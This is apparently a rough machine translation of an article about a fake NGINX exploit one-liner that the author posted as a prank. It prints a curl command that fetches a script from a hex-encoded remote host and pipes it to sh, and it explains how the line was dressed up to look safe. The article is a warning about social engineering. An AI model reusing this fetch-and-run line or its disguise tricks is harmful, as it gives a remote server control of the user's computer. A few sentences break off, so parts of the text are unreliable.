Nota. transl.:
TL; DR: Ayaw gamita ang file pipelining sa sh o bash sa bisan unsang mga kahimtang. Kini usa ka maayong paagi aron mawala ang kontrol sa imong kompyuter.
Gusto nakong ipaambit kanimo ang usa ka mubo nga istorya bahin sa usa ka komiks nga pagpahimulos sa PoC nga gihimo kaniadtong Mayo 31st. Mipakita dayon siya agig tubag sa balita gikan sa
Pagkahuman sa pagtrabaho sa usa ka bag-ong teknik sa obfuscation sa curl, gikutlo nako ang orihinal nga tweet ug "nag-leak sa usa ka nagtrabaho nga PoC" nga gilangkuban sa usa ka linya sa code nga nagpahimulos kuno sa nadiskubre nga pagkahuyang. Siyempre, kini bug-os nga walay pulos. Nagtuo ko nga ma-expose dayon ko, ug sa labing maayo makadawat ko og duha ka retweets (oh well).
Apan, dili nako mahunahuna ang sunod nga nahitabo. Nitaas ang pagkapopular sa akong tweet. Katingad-an, sa pagkakaron (15:00 sa oras sa Moscow Hunyo 1) pipila ka mga tawo ang nakaamgo nga kini usa ka peke. Daghang mga tawo ang nag-retweet niini nga walaβy pagsusi niini (labi na ang pagdayeg sa matahum nga mga graphic nga ASCII nga gipagawas niini).
Tan-awa ra kung unsa kini ka matahum!
Samtang kining tanan nga mga loop ug mga kolor maayo, klaro nga ang mga tawo kinahanglan nga magpadagan sa code sa ilang makina aron makita kini. Sa swerte, ang mga browser nagtrabaho sa parehas nga paagi, ug inubanan sa kamatuoran nga dili gyud ko gusto nga makasulod sa ligal nga kasamok, ang code nga gilubong sa akong site naghimo lang og echo nga mga tawag nga wala pagsulay sa pag-install o pagpatuman sa bisan unsang dugang nga code.
Usa ka gamay nga digression:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Socio-electronic engineering (SEE) - labaw pa sa phishing
Ang kaluwasan ug pagkapamilyar maoy dakong bahin niini nga eksperimento. Sa akong hunahuna sila ang hinungdan sa iyang kalampusan. Ang command line klaro nga nagpasabot sa seguridad pinaagi sa paghisgot sa "127.0.0.1" (ang iladong localhost). Ang Localhost gikonsiderar nga luwas ug ang datos niini dili mobiya sa imong kompyuter.
Ang pagkapamilyar mao ang ikaduhang yawe nga SEE nga bahin sa eksperimento. Tungod kay ang target audience nag-una nga naglangkob sa mga tawo nga pamilyar sa mga sukaranan sa seguridad sa kompyuter, importante ang paghimo og code aron ang mga bahin niini daw pamilyar ug pamilyar (ug busa luwas). Ang paghulam sa mga elemento sa daan nga mga konsepto sa pagpahimulos ug paghiusa niini sa dili kasagaran nga paagi napamatud-an nga malampuson kaayo.
Sa ubos mao ang usa ka detalyado nga pagtuki sa one-liner. Ang tanan niini nga lista gisul-ob kosmetiko nga kinaiya, ug halos walay gikinahanglan alang sa aktuwal nga operasyon niini.
Unsa nga mga sangkap ang kinahanglan gyud? Kini -gsS
, -O 0x0238f06a
, |sh
ug ang web server mismo. Ang web server walay bisan unsang malisyosong instruksyon, apan nagsilbi lang nga ASCII graphics gamit ang mga command echo
sa script nga anaa sa index.html
. Sa diha nga ang user misulod sa usa ka linya uban sa |sh
sa tunga-tunga, index.html
gikarga ug gipatuman. Maayo na lang, ang mga tig-atiman sa web server walay daotang tuyo.
-
../../../%00
- nagrepresentar sa pag-adto sa unahan sa direktoryo; -
ngx_stream_module.so
β dalan paingon sa random NGINX module; -
/bin/sh%00<'protocol:TCP'
- naglusad kuno mi/bin/sh
sa target nga makina ug i-redirect ang output sa TCP channel; -
-O 0x0238f06a#PLToffset
- tinago nga sangkap, gidugang#PLToffset
, aron tan-awon sama sa usa ka memory offset sa usa ka paagi nga anaa sa PLT; -
|sh;
- laing importante nga tipik. Kinahanglan namon nga i-redirect ang output sa sh/bash aron mapatuman ang code nga gikan sa nag-atake nga web server nga nahimutang sa0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- usa ka dummy diin gipasabut sa netcat/dev/tcp/localhost
aron ang tanan tan-awon nga luwas pag-usab. Sa pagkatinuod, kini wala'y mahimo ug gilakip sa linya sa katahum.
Gitapos niini ang pag-decode sa usa ka linya nga script ug ang paghisgot sa mga aspeto sa "socio-electronic engineering" (intricate phishing).
Web Server Configuration ug Countermeasures
Tungod kay ang kadaghanan sa akong mga subscriber kay infosec/hacker, nakahukom ko nga himoon ang web server nga mas makasugakod sa mga ekspresyon sa βinteresβ sa ilang bahin, aron lang nga ang mga lalaki adunay buhaton (ug kini makalingaw sa gibutang). Dili nako ilista ang tanan nga mga lit-ag dinhi tungod kay ang eksperimento nagpadayon pa, apan ania ang pipila ka mga butang nga gibuhat sa server:
- Aktibo nga nagmonitor sa mga pagsulay sa pag-apod-apod sa pipila ka mga social network ug gipuli ang lainlaing mga thumbnail sa preview aron madasig ang tiggamit sa pag-klik sa link.
- Gi-redirect ang Chrome/Mozilla/Safari/etc sa Thugcrowd promotional video imbes nga ipakita ang shell script.
- Nagtan-aw alang sa OBVIOUS nga mga timailhan sa pagsulod / dayag nga pag-hack, ug dayon magsugod sa pag-redirect sa mga hangyo sa NSA servers (ha!).
- Nag-instalar sa usa ka Trojan, ingon man usa ka BIOS rootkit, sa tanan nga mga kompyuter kansang mga tiggamit mibisita sa host gikan sa usa ka regular nga browser (nagkadlaw lang!).
Usa ka gamay nga bahin sa antimer
Niini nga kaso, ang akong bugtong tumong mao ang pag-master sa pipila ka mga bahin sa Apache - ilabi na, ang mga cool nga mga lagda alang sa pag-redirect sa mga hangyo - ug ako naghunahuna: nganong dili?
NGINX Exploit (Tinuod!)
Pag-subscribe sa
Source: www.habr.com